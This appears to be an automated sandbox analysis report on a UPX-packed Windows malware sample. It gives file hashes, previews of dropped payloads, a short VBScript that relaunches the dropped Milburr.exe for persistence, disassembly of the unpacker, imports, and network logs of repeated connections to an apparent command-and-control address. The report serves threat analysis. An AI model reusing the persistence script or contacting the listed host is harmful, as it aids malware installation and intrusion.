                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):143378
                                            Entropy (8bit):2.9932403669409404
                                            Encrypted:false
                                            SSDEEP:96:AIXLr44+F05BDjciMi0Fl7dSA6V5vevGcu29IwyJuv35rWVjjYqnBaAJZdjurebD:H3LjC7YmGcu29IwyJuv35rWVgqnBaA
                                            MD5:B98EE815FE928B457A8CA6290CA38293
                                            SHA1:B2A6929D5A5B461AD3AA6A8ED873F2E5FC106FD5
                                            SHA-256:D1DE55CC4B804A902CD9ECBC8C4658586A9B85D4A26F147E49CA17406EBE5C6B
                                            SHA-512:2964C872A41DDAC596490BE2C9B4797EE97294503D509EA8E6B8FC8D43336BF2896189AF88C8A225BB3E59F4127BC7CB81B9C05ED927B813AEB04DE4F80AF5BB
                                            Malicious:false
                                            Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Category:dropped
                                            Size (bytes):921600
                                            Entropy (8bit):7.775145133962969
                                            Encrypted:false
                                            SSDEEP:24576:0rl6kD68JmlotQf1nQr8zKS7ifTcvt2S3Sc1YNTN:Cl328U2yfuo2hfwvtJCxT
                                            MD5:BE20DFFFCBA37064D6087AA714036873
                                            SHA1:4F50F7F954ED27B8E3373A5D900905D98D1BB51E
                                            SHA-256:C889443786DC57C284A40FD1A9764BAD2F026A8C20E191059707D1646FF931E0
                                            SHA-512:955A14D104EDF528CD3D1F140181E6222CC1F88C8F1FB0A6A60FA0D37962B34C535A29E45BA029CF8DAA039DF06D25B26689FEB600FB8B499FE46DE0B3BF4696
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."......`..........`*.......0....@.......................................@...@.......@.....................@...$....0..@...................d.......................................D,..H...........................................UPX0....................................UPX1.....`.......^..................@....rsrc........0.......b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):284
                                            Entropy (8bit):3.38394623991052
                                            Encrypted:false
                                            SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Klxbs7nriIM8lfQVn:DsO+vNlDQ1kkmA2n
                                            MD5:86B98D0A8F987C1D3016FCC2EB957CD5
                                            SHA1:98AF46925D84EF241EB425E57DDF80670FA7E630
                                            SHA-256:E35ED9BC0F1482905A13771C4FC11F91DA24515AB5E759926F4C8E5F1B2E0858
                                            SHA-512:F41AA40F748DE917CE86D40BEA5CD7A4A76F9995D59EDA50ABDA5639DCE92BBC71A0762C26719EC056421AC0A0BB594C0C9FDB981AB46A50FBFFCC32FB1E62EE
                                            Malicious:true
                                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.o.b.t.e.n.e.b.r.a.t.e.\.M.i.l.b.u.r.r...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Entropy (8bit):7.775145133962969
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            File name:l1QC9H0SNR.exe
                                            File size:921'600 bytes
                                            MD5:be20dfffcba37064d6087aa714036873
                                            SHA1:4f50f7f954ed27b8e3373a5d900905d98d1bb51e
                                            SHA256:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0
                                            SHA512:955a14d104edf528cd3d1f140181e6222cc1f88c8f1fb0a6a60fa0d37962b34c535a29e45ba029cf8daa039df06d25b26689feb600fb8b499fe46de0b3bf4696
                                            SSDEEP:24576:0rl6kD68JmlotQf1nQr8zKS7ifTcvt2S3Sc1YNTN:Cl328U2yfuo2hfwvtJCxT
                                            TLSH:F815238BB9D22547D926FEB704230C54C7EBBE1979B87205486F3E1696B3293203B51F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                            Icon Hash:0d2d0d1723293133
                                            Entrypoint:0x562a60
                                            Entrypoint Section:UPX1
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6757B2BE [Tue Dec 10 03:17:18 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:fc6683d30d9f25244a50fd5357825e79
                                            Instruction
                                            pushad
                                            mov esi, 0050D000h
                                            lea edi, dword ptr [esi-0010C000h]
                                            push edi
                                            jmp 00007F08C8EF734Dh
                                            nop
                                            mov al, byte ptr [esi]
                                            inc esi
                                            mov byte ptr [edi], al
                                            inc edi
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF732Fh
                                            mov eax, 00000001h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            add ebx, ebx
                                            jnc 00007F08C8EF734Dh
                                            jne 00007F08C8EF736Ah
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF7361h
                                            dec eax
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            jmp 00007F08C8EF7316h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            jmp 00007F08C8EF7394h
                                            xor ecx, ecx
                                            sub eax, 03h
                                            jc 00007F08C8EF7353h
                                            shl eax, 08h
                                            mov al, byte ptr [esi]
                                            inc esi
                                            xor eax, FFFFFFFFh
                                            je 00007F08C8EF73B7h
                                            sar eax, 1
                                            mov ebp, eax
                                            jmp 00007F08C8EF734Dh
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF730Eh
                                            inc ecx
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF7300h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            add ebx, ebx
                                            jnc 00007F08C8EF7331h
                                            jne 00007F08C8EF734Bh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jnc 00007F08C8EF7326h
                                            add ecx, 02h
                                            cmp ebp, FFFFFB00h
                                            adc ecx, 02h
                                            lea edx, dword ptr [edi+ebp]
                                            cmp ebp, FFFFFFFCh
                                            jbe 00007F08C8EF7350h
                                            mov al, byte ptr [edx]
                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD4 build 31101
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD4 build 31101
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1ed840 | 0x424 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x163000 | 0x8a840 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1edc64 | 0xc | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x162c44 | 0x48 | UPX1
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            UPX0 | 0x1000 | 0x10c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            UPX1 | 0x10d000 | 0x56000 | 0x55e00 | 3068eaff798efd25fba376a74becc907 | False | 0.9872464064774381 | data | 7.935578392322046 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x163000 | 0x8b000 | 0x8ae00 | 5c159fbf3d4ef645401aa34a46905f5c | False | 0.8487391707920792 | data | 7.584238827929412 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x16351c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0x163648 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0x163774 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0x1638a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | Great Britain | 0.45567375886524825 |
| RT_ICON | 0x163d0c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | Great Britain | 0.299953095684803 |
| RT_ICON | 0x164db8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | Great Britain | 0.2274896265560166 |
| RT_ICON | 0x167364 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | Great Britain | 0.18865139348134152 |
| RT_ICON | 0x16b590 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | Great Britain | 0.13214243463858985 |
| RT_MENU | 0xdfd98 | 0x50 | empty | English | Great Britain | 0 |
| RT_STRING | 0xdfde8 | 0x594 | empty | English | Great Britain | 0 |
| RT_STRING | 0xe037c | 0x68a | empty | English | Great Britain | 0 |
| RT_STRING | 0xe0a08 | 0x490 | empty | English | Great Britain | 0 |
| RT_STRING | 0xe0e98 | 0x5fc | empty | English | Great Britain | 0 |
| RT_STRING | 0xe1494 | 0x65c | empty | English | Great Britain | 0 |
| RT_STRING | 0xe1af0 | 0x466 | empty | English | Great Britain | 0 |
| RT_STRING | 0xe1f58 | 0x158 | empty | English | Great Britain | 0 |
| RT_RCDATA | 0x17bdbc | 0x71518 | data | | | 1.000325324462676 |
| RT_GROUP_ICON | 0x1ed2d8 | 0x4c | data | English | Great Britain | 0.8157894736842105 |
| RT_GROUP_ICON | 0x1ed328 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x1ed340 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x1ed358 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x1ed370 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x1ed450 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess |
| ADVAPI32.dll | GetAce |
| COMCTL32.dll | ImageList_Remove |
| COMDLG32.dll | GetOpenFileNameW |
| GDI32.dll | LineTo |
| IPHLPAPI.DLL | IcmpSendEcho |
| MPR.dll | WNetUseConnectionW |
| ole32.dll | CoGetObject |
| OLEAUT32.dll | VariantInit |
| PSAPI.DLL | GetProcessMemoryInfo |
| SHELL32.dll | DragFinish |
| USER32.dll | GetDC |
| USERENV.dll | LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| VERSION.dll | VerQueryValueW |
| WININET.dll | FtpOpenFileW |
| WINMM.dll | timeGetTime |
| WSOCK32.dll | connect |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | Great Britain |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
                                            Jan 10, 2025 23:01:37.805371046 CET500133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:37.805541039 CET500133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:37.810322046 CET367850013192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:38.816343069 CET500153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:38.821271896 CET367850015192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:38.826126099 CET500153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:38.826379061 CET500153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:38.831409931 CET367850015192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:40.251535892 CET367850015192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:40.251635075 CET500153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:40.251698971 CET500153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:40.256491899 CET367850015192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:41.253679991 CET500163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:41.258678913 CET367850016192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:41.258924007 CET500163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:41.259088039 CET500163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:41.263952017 CET367850016192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:42.663840055 CET367850016192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:42.663959026 CET500163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:42.664020061 CET500163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:42.668905020 CET367850016192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:43.675574064 CET500173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:43.680597067 CET367850017192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:43.680675983 CET500173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:43.680923939 CET500173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:43.685688972 CET367850017192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:45.110914946 CET367850017192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:45.110989094 CET500173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:45.111082077 CET500173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:45.115981102 CET367850017192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:46.124742985 CET500183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:46.668261051 CET367850018192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:46.668387890 CET500183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:46.668952942 CET500183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:46.675213099 CET367850018192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:48.073779106 CET367850018192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:48.074188948 CET500183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:48.074188948 CET500183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:48.079099894 CET367850018192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:49.081864119 CET500203678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:49.086833000 CET367850020192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:49.086909056 CET500203678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:49.087250948 CET500203678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:49.092050076 CET367850020192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:50.514153004 CET367850020192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:50.514614105 CET500203678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:50.514614105 CET500203678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:50.519432068 CET367850020192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:51.488185883 CET500213678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:51.493236065 CET367850021192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:51.493316889 CET500213678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:51.493566036 CET500213678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:51.498415947 CET367850021192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:52.898313046 CET367850021192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:52.902139902 CET500213678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:52.902206898 CET500213678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:52.907016993 CET367850021192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:53.847803116 CET500223678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:53.983208895 CET367850022192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:53.986354113 CET500223678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:53.986538887 CET500223678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:53.991373062 CET367850022192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:55.406275988 CET367850022192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:55.406356096 CET500223678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:55.406394005 CET500223678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:55.411266088 CET367850022192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:56.316282034 CET500233678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:56.321300030 CET367850023192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:56.326184988 CET500233678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:56.326471090 CET500233678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:01:56.331283092 CET367850023192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:57.747129917 CET367850023192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:01:57.749159098 CET500233678192.168.2.6192.210.150.26
